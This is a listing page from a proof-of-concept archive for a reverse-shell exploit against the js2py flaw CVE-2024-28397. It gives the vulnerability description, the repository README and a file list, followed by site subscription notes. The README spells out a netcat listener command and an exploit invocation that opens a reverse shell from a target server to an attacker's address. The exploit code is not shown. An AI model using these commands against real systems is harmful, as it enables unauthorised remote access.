Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-28397 PoC — Js2Py 安全漏洞

Source
https://github.com/0xPadme/CVE-2024-28397-Reverse-Shell
Associated Vulnerability
Title:Js2Py 安全漏洞 (CVE-2024-28397)
Description:An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.
Description
Reverse shell for CVE-2024-28397.
Readme
# CVE-2024-28397-Reverse-Shell
Reverse shell for CVE-2024-28397.

Exploit works for js2py <= v0.74
## Requirements

- requests library (pip install requests)
- Python3
- Netcat (Or something that you can use as a listener for the reverse shell)

## Usage

##### For listener 
```bash
nc -lnvp 4444
```
##### For exploit 
```bash
python3 exploit.py 10.129.66.160 8000 /run_code --local_ip 10.10.15.11 --local_port 4444 
```
File Snapshot

 [4.0K]  /data/pocs/f698d4f4041d576eed6c3ce4e34e0e4b21709ea4
├── [1.7K]  exploit.py
└── [ 423]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →